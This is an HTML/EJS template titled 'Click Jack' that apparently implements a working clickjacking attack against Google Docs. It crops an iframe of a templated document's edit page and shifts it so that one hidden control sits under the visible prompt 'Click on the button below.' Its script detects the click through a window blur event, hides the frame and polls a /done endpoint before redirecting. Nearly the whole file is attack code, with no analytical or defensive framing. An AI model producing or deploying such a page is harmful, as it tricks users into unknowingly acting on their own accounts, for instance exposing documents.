<!DOCTYPE html>
<html>
  <head>
    <title>Click Jack</title>
    <link rel='stylesheet' href='/stylesheets/style.css' />
	<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
	<script>
	$(function() {
		var myConfObj = {
		  iframeMouseOver : false
		}
				
		window.addEventListener('blur',function(){
		  if(myConfObj.iframeMouseOver){
			document.getElementById('stat').innerHTML = 'loading...'
			setTimeout(function(){
				document.getElementById('i_frame').style.display = 'none';
			},500);
		  }
		  
  		window.setInterval(function(){
  			$.ajax({
  			  url: "/done",
  			  success: function( data ) {
  			    if(data){
  					location.href='/';
  					//console.log(data);
  				}
  			  }
  			});
  		},500);
		  
		});
 
		document.getElementById('i_frame').addEventListener('mouseover',function(){
		   myConfObj.iframeMouseOver = true;
		});
		document.getElementById('i_frame').addEventListener('mouseout',function(){
		    myConfObj.iframeMouseOver = false;
		});	
	});
	
	</script>
	
  </head>
  <body>
    <p>Click on the button below.</p>
	
	<div style="overflow: hidden; width: 99px; height: 29px; position: relative;" id="cksl6">
	<iframe name="cksl7" src="https://docs.google.com/a/m-austin.com/file/d/<%= doc_id %>/edit" id="i_frame" style="border: 0pt none ; left: -285px; top: -393px; position: absolute; width: 1233px; height: 435px;" scrolling="no"></iframe></div>
	
	<div id="stat">ready.</div>
	
  </body>
</html>